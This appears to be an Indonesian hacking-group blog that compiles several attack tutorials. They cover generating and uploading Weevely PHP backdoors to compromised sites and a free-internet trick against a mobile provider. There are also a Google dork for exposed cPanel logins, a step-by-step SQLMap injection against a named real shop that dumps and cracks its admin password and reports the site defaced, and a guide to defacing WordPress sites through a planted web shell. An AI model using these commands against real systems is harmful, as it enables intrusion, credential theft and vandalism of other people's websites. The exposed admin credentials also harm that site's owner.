Backconnect dengan Weevely [ Back|Track 5 R3 ]

Assalamualaikum sobat IDCA, kesempatan kali ini kami akan memberikan tutorial "Back connect" denganWeevely untuk netcat nanti tutorialnya bisa menyusul. Sebelum melangkah ke tutorialnya kita berkenalan dulu dengan backconnect itu sendiri :D .


Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukanremote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Oke, sudah sedikit jelas kan? kita lanjut ke tutorial heheh untuk pengguna windows harus instal  module python-redline dulu jika ingin menggunakan weevely ^_^

Bahan-bahan :

1. PC / Laptop yang terkoneksi dengan Internet
2. Website yang sudah ditanam shell
3. File Backdoor

Langkah-langkahnya :

1. Buka terminal ( atau tekan CTRL + ALT + T ) , lalu ketikan

cd /pentest/backdoors/web/weevely/" kemudian tekan enter ( Tampilan )

 2. Setelah itu kita buat backdoors dulu dengan cara, ketik :

./weevely.py generate [ namafile.php ] , contoh : "./weevely.py generate 0000 bim.php" ( Tampilan )

3. Jika sudah dibuat maka akan muncul tulisan "[generate.php] Backdoor file 'bim.php' created with password '0000'." sekarang coba cek filenya di dir/folder "pentest/backdoors/web/weevely"

4. Sekarang tinggal upload file tersebut ke web yang akan kita back connect.

5. Jika sudah berhasil di upload sekarang kembali ke terminal tadi, lalu ketikan :

./weevely.py [url file backdoors] [password]" sebagai contoh :

./weevely.py http://bimo-cyber.com/tmp/bim.php 0000  ( Tampilan )

Selamat sekarang anda sudah terhubung ke server target, nah untuk tutorial rooting saya bagis setelah dapat WIFI ya hehehe. Jika ada yang kurang jelas silahkan tanyakan di grup kami aja ya, jangan lewat INBOX :)

Trik Internet Gratis Smartfren

Status : Trik sudah tidak bisa lagi 

Asslamualaikum..

Dalam kehidupan sehari hari, internet merupakan sebuah kebutuhan bagi semua orang. berbagai aktivitas banyak dilakukan di Internet. berbagai layanan diberikan oleh masing masing provider dengan beragam agar mampu memberikan layanan yg terbaik. namun semua itu tak memberikan para pelanggan merasa puas mengingat layanan internet yang diberikan dari provider masih jauh dari harapan. maka dari itu berbagai cara dilakukan agar internet yang digunakan bisa dimanfaatkan secara maksimal. dan salah satunya dibuat menjadi gratisan. :D

Untuk Trik Internet Gratis lainnya klik DISINI

nah disini saya akan memberikan trik internet smartfren agar bisa diakses dengan gratis. silahkan disimak aja yah :*

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Bahan bahan yg dibutuhkan:

1. Inject Smartfren + Ultrasurf
3. Modem Smartfren Tanpa kuota dan pulsa

Pertama konekkan dulu modemnya... setelah itu buka injectnya dan klik ON

lalu buka ultrasurfnya.. silahkan di setting dulu proxynya... untuk port samakn denan injectnya.

kalo udah sukses konek ultrasurfnya ke server.. Tinggal browsing dah :)

untuk settingan lainnya liat gambar:

Firefox

IDM

kalo Google Chrome langsung otomatis settingannya dari ultrasurf. udah begitu aja yah,, semoga bermanfaat. harap jangan diperjualbelikan... thanks to Kopaci..

Password : idca

Exploit WordPress Complete Gallery File Upload

Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<

TUTORIAL ADA DISINI

Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<

TUTORIAL ADA DISINI

Cara Mendapatkan Banyak CPanel Dengan Mudah

Assalamualaikum...

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya 

 inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.

Nah tinggal dibuka satu satu Cpanelnya yah :)

Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

• Python | Available on Backtrack
• Sqlmap | Available on Backtrack

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

• cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

• python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

• python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

• python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

• python sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

• do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

• Tujuan Pertama
• Tujuan Kedua
• Tujuan Ketiga
• Tujuan Keempat
• Tujuan Keenam

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Cara Tebas Index Website CMS Wordpress

Assalamualaikum,,,

Sekarang ane mau ngasi cara melakukan defacing /merubah halaman muka web ato istilah lainya tebas index.. hehhe

Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p

Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3

ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3

Notice! 
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain! BACKUP Data guys :)

Dowload Madspotshell 

Sebelumnya sobat harus bisa tanem shell dulu, klo ga ada shell yg ditanem di web gimana mo nebas indexnya,, wkwkwk :p

bagi sobat yg sudah punya langsung Buka Shellnya yah.. ;)

Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb

Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p

Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html  halaman deface sobat! atau  bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadiindex.php_backup lalu klik [>>] untuk save!

Keterangan:

R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi

selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!

kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p

Cara Mencari Halaman Web Login Dengan Acunetix Web Vulnerability Scanner 8

Assalamualaikum sobat2 IDCA.. :p

Hmm,, dilihat dari keluhan2 sobat, kebanyakan saat melakukan eksploitasi web dengan metode SQL Injection, rata rata2 kesulitan menemukan halaman login admin web, jadi sedikit ane share trik nya yahh.. yup langsung di simak aja! :p

kok pake Acunetix, iyah ane kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools admin finders kita mencari dengan cara hanya menggunakan list umum seperti : admin, login, system dsb. jadi kita hanya terpatok di list itu aja .

Lihat Gambar!

Download : Acunetix Web Vulnerability Scanner 8 dan Patch+Key

Password: Lihat

yup begitu saja yah, moga bermanfaat ;)

UPDATE: Link download sudah diperbaiki.. :D